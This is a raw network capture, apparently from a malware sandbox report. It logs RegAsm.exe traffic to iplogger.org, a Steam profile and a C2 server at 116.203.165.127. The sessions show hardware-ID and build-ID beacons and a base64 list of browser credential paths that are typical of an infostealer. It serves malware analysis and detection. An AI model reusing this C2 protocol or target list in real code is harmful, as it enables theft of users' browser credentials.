2024-09-21 12:48:12 UTC	8000	IN	Data Raw: cf c7 13 11 b5 6b ad 52 6d 32 4f e8 b7 de 2c b5 6e c0 82 41 d6 ba d7 f0 7a ca 04 94 c4 9f aa f1 4e 77 4d 9d c0 3c 3a 8f 7c 04 bb e8 d1 c5 57 53 d9 2c e7 1b 59 bf 2a 0c 13 26 e7 06 59 d2 bc 82 69 9a 6e 8a 16 ea 85 d3 f7 5d 09 a4 8e 72 a6 a8 2a 46 9b 56 96 5c 11 a9 f9 b9 02 66 d7 07 0a 8b 4c d3 5a 7f be 58 e7 4e 0b 55 09 a2 49 8e eb b2 08 97 08 96 a1 c0 8d 50 95 00 7f fb 7c d0 c2 09 82 ea 8e 67 46 24 f6 a0 d1 4b df 28 12 50 65 c0 a7 10 d8 13 19 1c 67 83 36 02 e9 0b b1 ee 7e 28 18 4a 62 8b ec 6e a3 13 27 10 9b 26 2d bd 53 77 04 24 36 40 3e a4 db 8c f5 e8 5a 0d a9 3c 93 a7 7d 47 d3 9e 1a 22 b5 bf 25 12 13 57 62 39 8f 06 57 a4 66 52 84 ce 70 fc 04 bf 3d a7 ce 18 45 9b 0a c4 dd 23 cc e5 08 31 85 78 28 dd ee c2 e7 b3 73 d9 6f 7f 4b ec d3 a0 18 35 18 78 06 99 64 Data Ascii: kRm2O,nAzNwM<:\|WS,Y&Yin]rFV\fLZXNUIP\|gF$K(Peg6~(Jbn'&-Sw$6@>Z<}G"%Wb9WfRp=E#1x(soK5xd
2024-09-21 12:48:12 UTC	8000	IN	Data Raw: 3a f3 7a db 8f 2f d7 2c 05 ab 3a b1 bb 35 6a 7a ee 2e ed 6d c6 82 c6 4e ab 5c f0 42 6f 04 e4 e4 60 2b 00 d5 bf 66 6c 26 f1 46 be 08 e9 9e 0c 60 37 81 6e 97 08 8c b3 79 ed bc 32 4f 44 81 19 31 05 d7 7c d7 9a 3d 52 06 14 74 ba 75 f3 d6 14 39 a3 a2 66 e1 4d e3 b9 3d b3 b4 69 26 9b d0 81 3e f8 b3 e0 15 2c eb ba 1e 00 f5 74 58 b0 b8 19 da 18 88 49 84 7f 5c 57 62 37 f3 7e f5 ca 6c 29 a2 08 44 1b c1 5a ad 6e 5e 5a 64 96 82 da 0d fe 4d 52 d9 f6 5e e5 cd 9a 0d b4 cb fd ec 39 86 ab 32 e3 bd 14 28 ff 43 48 8d d5 8f 19 ce 37 48 b5 9e 10 1e 5e 29 19 45 fa b6 f8 4c 1a 96 ad 3d f4 3c 5c a1 10 9b a1 79 d4 02 36 6c 6f 3f 5a 26 71 23 b6 0c 08 3c 00 7a 6e b8 d4 d9 14 c4 e0 7c e4 2d ec 9a 12 6d fa 25 15 76 5c b8 7d 22 23 10 8f d4 27 3d 6f 05 41 fa ab 77 95 48 a5 4c 2b f0 03 Data Ascii: :z/,:5jz.mN\Bo`+fl&F`7ny2OD1\|=Rtu9fM=i&>,tXI\Wb7~l)DZn^ZdMR^92(CH7H^)EL=<\y6lo?Z&q#<zn\|-m%v\}"#'=oAwHL+
2024-09-21 12:48:12 UTC	8000	IN	Data Raw: 64 21 3d 73 df 1c f5 28 d9 b8 7c 0f 1d 1f 5f a2 03 3a 49 8a 36 2d 02 09 76 de 9b 1b 39 1e 12 57 94 30 dd 5f 9c 95 17 c0 d8 d0 79 47 d4 9b 85 b6 30 1c 41 04 6a 84 43 d6 e5 f7 07 18 e2 b4 a5 a9 73 1b 13 70 cc 08 44 07 2d a5 ba 49 18 e7 83 2c 18 7a 9e c9 69 0e d1 b7 e3 ab 00 f6 ca 79 d7 90 e6 e9 89 26 89 85 55 e6 d1 c4 3c aa 29 f9 b4 6d 16 4e e1 c3 59 cc e1 bc bd bf 68 ec 78 54 e5 95 2d 04 1f 2a 90 2b d2 9f 0d f6 9d 8f 10 0f dd 24 de d9 64 99 91 ae 90 42 3e 15 39 7e 08 97 98 2f 6e f6 89 47 a1 59 9c 9b 85 72 d1 0f 88 2f 02 24 19 af eb 16 6d 93 ad 4e af ad e8 15 bf 6b 33 0b 2e 1f e0 7d e8 92 20 ce ef 05 79 0e 03 ec 06 30 64 d4 59 4d c4 01 06 3a 3b 6f 4d 01 53 41 73 04 18 e8 88 5d c1 0b 49 83 04 a7 23 66 2f 7d bb 9b 6d 1a 61 06 67 b3 91 17 97 12 5e ff df 28 90 Data Ascii: d!=s(\|_:I6-v9W0_yG0AjCspD-I,ziy&U<)mNYhxT-*+$dB>9~/nGYr/$mNk3.} y0dYM:;oMSAs]I#f/}mag^(
2024-09-21 12:48:12 UTC	8000	IN	Data Raw: 89 ea 72 ff c0 79 23 13 8c 7a 47 af 50 d9 8e 0c b0 70 e5 15 a1 59 3e 84 65 ef c8 8b be 19 b7 c3 cf 21 63 a4 6c f3 9e 1b 91 35 e5 71 72 b2 a8 df c7 67 9b cc 10 99 e4 d0 53 b7 53 75 50 fa d0 d1 c1 1f 1d 69 2d 5f 6e 2a c0 e8 bc 78 93 64 3c ee 97 d1 ac 35 79 a0 d5 f7 10 0e f6 35 50 f1 a8 d5 4e c8 a9 30 59 f7 b1 37 e8 41 dc 35 05 b0 33 3f 97 ab 06 37 93 a9 e4 9e ac 3c fe 78 5b b7 cd b7 d0 bf 2a 13 0a 65 40 d9 c1 b0 e9 82 69 06 ce 50 1f 6b 7a 7f b2 bb 6a 10 bd c3 22 00 f3 00 14 c6 c1 c9 a2 9a 5a 81 c2 61 22 04 5f 20 49 2d 31 02 a7 13 d6 2a 8d 0b b9 b1 78 a6 30 d7 2d ca 62 bb 97 72 f1 e7 3e bf 47 91 d1 42 e9 9c 94 30 fa 8d 5b 30 bf 5d 5e f4 af 6a ab 9b 99 84 87 ea c8 2d b4 8b 65 75 35 19 52 bc d3 c3 bf f7 c6 24 e5 a3 b4 e8 26 f6 79 c7 d5 c6 ca 2e e1 b7 ba c7 de Data Ascii: ry#zGPpY>e!cl5qrgSSuPi-_nxd<5y5PN0Y7A53?7<x[e@iPkzj"Za"_ I-1*x0-br>GB0[0]^j-eu5R$&y.
2024-09-21 12:48:12 UTC	8000	IN	Data Raw: 9d 7f b7 8e 3e a0 e7 34 ba 5d 1b 25 85 d0 5c b1 0b eb 8b cc c5 10 37 10 5e 25 a3 b1 5d 0c 68 04 8c 57 11 3a a1 6e e7 9b 14 38 c7 85 cf 0d df c3 a7 53 94 70 9c 9f 29 5a 7a 94 27 02 37 70 c7 26 ed 50 08 75 70 6d bc a0 02 0f 66 71 48 f4 06 cb 6d 16 3f 8d 2c ae 32 87 92 c8 1a d9 d3 d2 0f 89 38 43 21 54 b1 35 ff f3 66 aa 2f 54 14 3c b3 61 27 2d 9f fa 1a d5 47 e3 27 7c 9a 74 6a 3a bf 0e 99 68 7b 3e a9 23 15 16 9c d6 1b 40 b6 17 00 18 d0 a2 1d 27 6b 52 fe c2 7f 52 fc 76 92 85 d9 4d de 84 0f ea 9d ff 09 78 03 20 1f 7d 5c 06 a8 1c 8a fd fe 7b d2 07 b5 e2 d4 b4 27 1f 65 b9 aa 98 87 99 5c c4 c3 22 ce 15 40 5b 6b 1f 76 cb 35 43 0b 3d 40 83 15 45 ab ca 6f bb 8c 22 3b fa 4e 20 94 9b 6d ff 90 e5 c2 5a 4d 04 e0 1f e1 7f d6 b7 a8 ee 18 50 2c eb b9 b3 06 32 0c d0 d2 ba 8b Data Ascii: >4]%\7^%]hW:n8Sp)Zz'7p&PupmfqHm?,28C!T5f/T<a'-G'\|tj:h{>#@'kRRvMx }\{'e\"@[kv5C=@Eo";N mZMP,2
2024-09-21 12:48:12 UTC	8000	IN	Data Raw: 16 a7 2b 08 41 67 3f cc 3d 04 24 79 42 fc 27 be 2a 1a d9 e3 02 80 8f b6 1e 37 d9 1c bc dc 62 4c a5 8c 3f 7a 71 7c f6 77 10 cc 5e 2b b4 87 4b b5 8c f5 60 62 b2 d6 4f d6 5b 3f b4 4f dd 77 ae b7 63 b8 91 82 12 51 d5 48 0a 11 c7 f9 9b a5 95 ba 52 39 26 fc ea 59 da 29 3a ba 95 a9 88 84 c0 4a 1d bf 23 29 8b 37 02 65 50 0d 61 ab 77 53 3d 70 a0 ac d2 cc 9b d2 25 a7 76 c9 5f 8f 02 06 14 12 53 9a 19 52 ab f0 9a 3c a8 5f 75 7d 2b 1e 55 52 fa 9c aa c5 c1 24 06 b9 c5 19 02 b3 95 43 7a e1 1a eb 1a dc 85 17 ab 94 de c8 3f 27 29 9a 44 56 4c fb 8c 02 1d 00 50 cf 83 77 68 a3 a4 93 2d a3 2d 93 37 37 66 77 16 e1 08 db 30 c9 d5 c6 78 ce 39 bc 12 1f a8 bc 0d 8a c2 fd 78 09 63 4c 99 dc 67 0a f1 d5 61 e7 ef 33 96 a0 4f 9a 96 72 e8 26 47 7e 48 aa 3b 67 5d 34 ae 68 73 98 38 74 c4 Data Ascii: +Ag?=$yB'*7bL?zq\|w^+K`bO[?OwcQHR9&Y):J#)7ePawS=p%v_SR<_u}+UR$Cz?')DVLPwh--77fw0x9xcLga3Or&G~H;g]4hs8t
2024-09-21 12:48:12 UTC	8000	IN	Data Raw: a4 da 6e b2 ac 71 6e 2d ab b2 ad 47 be f6 35 26 87 88 b3 da 2a 37 c4 7a b6 ec 4c fc 8f 1e c9 8e 64 49 14 8b 6d a4 9e 88 4c 7e cc ca c5 fb 9f 78 24 5f 7e a2 be e0 24 4a 3e 03 71 63 3b 26 7d da ce 99 32 de 7a d8 b9 65 63 fc 3d 59 84 9e 9c 63 8f fa f2 27 64 29 6b b1 6d a9 31 af b0 31 ea e1 f9 26 bd 9d e3 2c ef 67 10 73 9d 5f 75 5f 5b 7b 49 ae 9e c8 58 f5 ae 13 e2 cb 7e 17 0a 56 09 2e d6 c4 60 b3 4f 1c d5 98 77 87 52 9c 7e 54 a7 01 8d 4a 90 98 8a 5b e8 0f 06 68 4f b1 e5 23 da 80 57 2a 16 6a 93 42 57 d4 d7 ec 4d 0b d2 2b 56 24 22 f9 1a 5e 16 df 80 4b 20 9a 81 b9 98 e4 ee cc 04 9d 38 f4 46 9a 84 6e 07 af df e5 8e 23 3c a3 f8 00 13 91 c3 37 d4 5c 11 8c 11 68 a7 69 ad 62 40 14 36 cd 03 f6 24 f6 fe 06 6e b1 ca dd b1 2c f5 cd aa 18 83 2c 7e 45 ae 35 53 c3 2c 98 fa Data Ascii: nqn-G5&7zLdImL~x$_~$J>qc;&}2zec=Yc'd)km11&,gs_u_[{IX~V.`OwR~TJ[hO#WjBWM+V$"^K 8Fn#<7\hib@6$n,,~E5S,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49735	172.67.74.161	443	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:32 UTC	196	OUT	GET /1nhuM4.js HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: iplogger.org
2024-09-21 12:48:32 UTC	995	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 12:48:32 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close memory: 0.43090057373046875 expires: Sat, 21 Sep 2024 12:48:32 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=31536000 x-frame-options: SAMEORIGIN CF-Cache-Status: BYPASS Set-Cookie: 40589004137263905=2; expires=Sun, 21 Sep 2025 12:48:32 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: clhf03028ja=8.46.123.33; expires=Sun, 21 Sep 2025 12:48:32 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fn2L1Vf58Yni3XzVN0zgjlUYDR%2BDhgRbGBzE2nvk2jMQnU3wSE%2BdFFkhoB1ES8e7EUdedUwsY2Yt%2FtRPi%2FgVsg0xpTwSUBOOCZ4fm7yON7Ak5hWQKKSktg4MIUFyZw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c6a2b89ee111998-EWR
2024-09-21 12:48:32 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-09-21 12:48:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49736	23.197.127.21	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:40 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:48:41 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 21 Sep 2024 12:48:41 GMT Content-Length: 34740 Connection: close Set-Cookie: sessionid=528bef74ad1442f574ff38c8; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-21 12:48:41 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-21 12:48:41 UTC	10062	IN	Data Raw: 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 Data Ascii: destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><di
2024-09-21 12:48:41 UTC	10164	IN	Data Raw: 6d 6d 75 6e 69 74 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 Data Ascii: mmunity.akamai.steamstatic.com\/","COMMUNITY_CDN_ASSET_URL":"https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/","STORE_CDN_URL":"https:\/\/store.akamai.steamstatic.com\/","PUBLIC_SHARE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49743	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:45 UTC	188	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:48:46 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:48:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49746	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:47 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:48:47 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 37 34 34 39 39 44 41 42 36 45 32 33 37 31 35 34 33 35 31 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 2d 2d 0d Data Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="hwid"7074499DAB6E2371543510-a33c7340-61ca------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------CFIECBFIDGDAKFHIEHJK--
2024-09-21 12:48:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:48:48 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|b7d8ef1d8933f25474cb615d1ce026a4\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49747	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:49 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:48:49 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------EGDBFIIECBGDGDGDHCAKCont
2024-09-21 12:48:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:48:49 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49751	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:51 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEHIIDGCFHIEGDGCBFHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:48:51 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------JEHIIDGCFHIEGDGCBFHDContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------JEHIIDGCFHIEGDGCBFHDContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------JEHIIDGCFHIEGDGCBFHDCont
2024-09-21 12:48:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:48:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
